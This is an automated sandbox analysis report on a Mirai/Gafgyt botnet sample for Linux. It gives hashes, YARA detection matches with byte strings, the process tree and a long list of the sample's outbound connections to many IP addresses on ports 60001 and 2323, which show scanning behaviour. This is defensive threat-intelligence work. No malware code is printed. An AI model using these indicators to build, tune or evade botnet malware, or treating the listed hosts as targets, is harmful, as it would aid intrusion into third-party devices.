Linux Analysis Report SLdtSSVlj2

Overview

General Information

Sample Name: SLdtSSVlj2
Analysis ID: 553479
MD5: 6b355f508658f7fbe9c91fad5d09d6b5
SHA1: 72a9d43e568016e0384a39e391391498695328bd
SHA256: 9010857d2724b141fc1ccc742e9d5d41ff50e102878d196fd9726458b0864c19
Tags: 32 elf mirai sparc
Infos:

Detection

Gafgyt Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Malicious sample detected (through community Yara rule)
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Yara signature match
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Creates hidden files and/or directories
Sample has stripped symbol table

Classification

Analysis Advice

None of the HTTP servers contacted by the sample answer. The sample is likely an old dropper that no longer works
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553479
Start date: 15.01.2022
Start time: 00:44:21
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 43s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: SLdtSSVlj2
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Detection: MAL
Classification: mal100.spre.troj.lin@0/4@0/0
Warnings:
  • Connection to analysis system has been lost, crash info: Unknown
  • TCP Packets have been reduced to 100

Process Tree

  • system is lnxubuntu20
  • SLdtSSVlj2 (PID: 5267, Parent: 5104, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/SLdtSSVlj2
  • systemd New Fork (PID: 5288, Parent: 1)
  • journalctl (PID: 5288, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5309, Parent: 1)
  • dbus-daemon (PID: 5309, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5321, Parent: 1)
  • whoopsie (PID: 5321, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5322, Parent: 1860)
  • pulseaudio (PID: 5322, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5323, Parent: 1)
  • rsyslogd (PID: 5323, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • fusermount (PID: 5324, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5325, Parent: 1)
  • systemd-journald (PID: 5325, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5326, Parent: 1334)
  • pulseaudio (PID: 5326, Parent: 1334, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5337, Parent: 1)
  • rtkit-daemon (PID: 5337, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5340, Parent: 1)
  • systemd-logind (PID: 5340, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 5398, Parent: 1320)
  • Default (PID: 5398, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5399, Parent: 1)
  • dbus-daemon (PID: 5399, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • gdm3 New Fork (PID: 5400, Parent: 1320)
  • Default (PID: 5400, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5401, Parent: 1)
  • systemd-journald (PID: 5401, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5402, Parent: 1)
  • whoopsie (PID: 5402, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5403, Parent: 1)
  • rsyslogd (PID: 5403, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5404, Parent: 1334)
  • pulseaudio (PID: 5404, Parent: 1334, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5407, Parent: 1)
  • systemd-logind (PID: 5407, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 5464, Parent: 1320)
  • Default (PID: 5464, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5465, Parent: 1)
  • dbus-daemon (PID: 5465, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5466, Parent: 1)
  • systemd-journald (PID: 5466, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5491, Parent: 1)
  • dbus-daemon (PID: 5491, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5496, Parent: 1)
  • whoopsie (PID: 5496, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5501, Parent: 1)
  • rsyslogd (PID: 5501, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5523, Parent: 1334)
  • pulseaudio (PID: 5523, Parent: 1334, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5527, Parent: 1)
  • dbus-daemon (PID: 5527, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5538, Parent: 1)
  • systemd-journald (PID: 5538, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5592, Parent: 1)
  • whoopsie (PID: 5592, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5595, Parent: 1)
  • rsyslogd (PID: 5595, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5599, Parent: 1)
  • rsyslogd (PID: 5599, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5600, Parent: 1)
  • whoopsie (PID: 5600, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5602, Parent: 1)
  • gpu-manager (PID: 5602, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • systemd New Fork (PID: 5603, Parent: 1)
  • generate-config (PID: 5603, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
  • systemd New Fork (PID: 5604, Parent: 1)
  • gpu-manager (PID: 5604, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • systemd New Fork (PID: 5605, Parent: 1)
  • generate-config (PID: 5605, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
  • systemd New Fork (PID: 5606, Parent: 1)
  • gpu-manager (PID: 5606, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
  • systemd New Fork (PID: 5607, Parent: 1)
  • generate-config (PID: 5607, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
  • systemd New Fork (PID: 5608, Parent: 1)
  • systemd New Fork (PID: 5609, Parent: 1)
  • cleanup

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
SLdtSSVlj2 | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x14908:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14978:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x149e8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14a58:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14ac8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14d38:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14d90:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14de8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14e40:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14e98:$xo1: oMXKNNC\x0D\x17\x0C\x12
SLdtSSVlj2 | Mirai_Botnet_Malware | Detects Mirai Botnet Malware | Florian Roth
  • 0x12c68:$x1: POST /cdn-cgi/
  • 0x14768:$s1: LCOGQGPTGP
  • 0x14280:$s4: QWRGPTKQMP
SLdtSSVlj2 | MAL_ELF_LNX_Mirai_Oct10_2 | Detects ELF malware Mirai related | Florian Roth
  • 0x12c68:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
SLdtSSVlj2 | JoeSecurity_Mirai_5 | Yara detected Mirai | Joe Security
SLdtSSVlj2 | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
5275.1.000000002ac99f32.000000004dded084.rw-.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x554:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x5c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x63c:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x6b0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x724:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x9a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x9f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xa50:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xaa8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xb00:$xo1: oMXKNNC\x0D\x17\x0C\x12
5276.1.000000002ac99f32.000000004dded084.rw-.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x554:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x5c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x63c:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x6b0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x724:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x9a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x9f8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xa50:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xaa8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0xb00:$xo1: oMXKNNC\x0D\x17\x0C\x12
5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x14908:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14978:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x149e8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14a58:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14ac8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14d38:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14d90:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14de8:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14e40:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x14e98:$xo1: oMXKNNC\x0D\x17\x0C\x12
5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp | Mirai_Botnet_Malware | Detects Mirai Botnet Malware | Florian Roth
  • 0x12c68:$x1: POST /cdn-cgi/
  • 0x14768:$s1: LCOGQGPTGP
  • 0x14280:$s4: QWRGPTKQMP
5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp | MAL_ELF_LNX_Mirai_Oct10_2 | Detects ELF malware Mirai related | Florian Roth
  • 0x12c68:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: SLdtSSVlj2, Virustotal: Detection: 53%
Source: SLdtSSVlj2, ReversingLabs: Detection: 62%

Networking:

Connects to many ports of the same IP (likely port scanning)
Source: global traffic, TCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
Uses known network protocols on non-standard ports
Source: unknown, Network traffic detected: HTTP traffic on port 49312 -> 60001
Source: unknown, Network traffic detected: HTTP traffic on port 60001 -> 49312
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 105.231.231.214:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 133.40.139.148:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 44.208.86.201:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 2.169.154.85:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 24.24.142.230:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 110.14.41.34:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.183.232.18:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 222.243.57.28:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 50.35.92.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 159.119.27.15:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.138.147.184:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 147.20.20.62:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 206.106.147.75:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.125.161.6:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.223.181.97:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.135.9.235:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 96.121.143.16:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.38.250.166:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 217.23.74.37:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 27.247.87.246:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.250.224.179:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 121.148.171.28:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 209.145.9.96:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 132.94.65.114:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 222.221.90.99:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 32.189.16.77:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 95.244.217.176:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 17.33.171.160:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 175.154.155.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.78.2.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 44.202.126.27:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.195.99.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 24.112.230.50:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 153.6.46.129:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 160.70.14.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 218.20.41.147:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.68.140.241:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.19.118.155:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 80.222.43.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 76.21.205.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.80.241.43:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 63.131.116.62:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 13.198.161.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.155.190.102:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 141.108.176.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 69.9.26.68:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.196.155.113:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 159.234.98.71:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 164.147.247.207:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 108.255.43.4:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 135.213.173.20:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 210.202.218.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 41.46.37.106:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 64.228.89.41:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 179.90.249.17:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 199.3.41.177:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 79.53.105.84:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 160.153.139.124:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.214.6.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 50.239.238.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.241.214.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 43.247.65.145:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.17.183.125:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.218.220.169:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 143.197.76.38:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 25.29.15.215:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.187.126.42:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.41.6.181:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.186.199.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 200.206.13.243:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.131.36.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 209.154.225.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.216.116.169:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 203.188.120.3:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 40.232.237.164:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 100.235.237.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.120.15.101:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 173.46.251.96:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 32.167.229.147:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 170.164.55.195:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.29.52.121:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.135.128.196:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.55.18.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.195.149.141:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 105.124.39.148:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 158.218.110.103:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.210.145.229:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 211.221.92.177:60001
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 23.67.190.152:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 125.246.65.242:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 83.205.81.248:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 167.165.177.98:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 31.141.132.247:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 125.121.0.237:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 132.234.2.150:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 141.178.238.177:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 203.98.221.137:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 73.142.96.208:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 159.28.12.71:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 48.193.25.197:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 35.57.21.190:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 99.252.13.187:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 66.129.239.80:2323
      Source: global trafficTCP traffic: 192.168.2.23:17263 -> 104.202.221.102:2323
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.38.175.50:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 156.66.213.74:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.58.252.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 51.137.108.86:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 107.221.21.232:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.247.207.73:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 167.134.185.30:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 223.137.246.203:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 78.58.51.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 71.93.105.85:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 140.157.228.235:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 140.135.133.43:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 137.207.119.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 86.243.116.171:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 209.105.176.97:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 107.184.165.49:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 90.163.46.26:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 139.213.177.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 213.179.150.216:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.40.223.54:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.254.93.247:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 20.124.5.40:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 57.123.110.60:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 191.7.49.149:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 204.64.24.113:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 139.13.74.206:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 104.238.86.213:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 182.137.224.126:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 211.104.26.249:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 186.73.137.91:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 95.132.15.65:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 206.113.249.157:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 101.221.204.12:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 198.36.53.24:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 182.63.45.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 4.160.21.251:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.86.128.3:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 167.147.108.208:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 93.136.97.32:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 80.136.152.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.184.15.32:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.249.189.191:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 177.253.251.99:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 187.64.88.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.171.230.234:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 193.98.45.150:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 82.121.57.163:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 217.120.150.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 65.12.82.99:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 76.210.165.73:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 77.239.139.110:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 52.179.164.93:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 102.58.179.252:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 142.74.243.78:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 62.252.156.38:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 96.10.130.133:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 166.208.236.225:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.134.96.46:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 87.127.214.48:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 223.143.13.216:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 12.124.154.198:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 185.77.127.138:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 121.245.72.172:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 61.201.118.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 179.149.154.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.182.75.240:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.97.128.205:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 142.53.154.192:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 96.227.22.89:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 108.91.13.82:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 188.224.212.234:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.106.24.29:60001
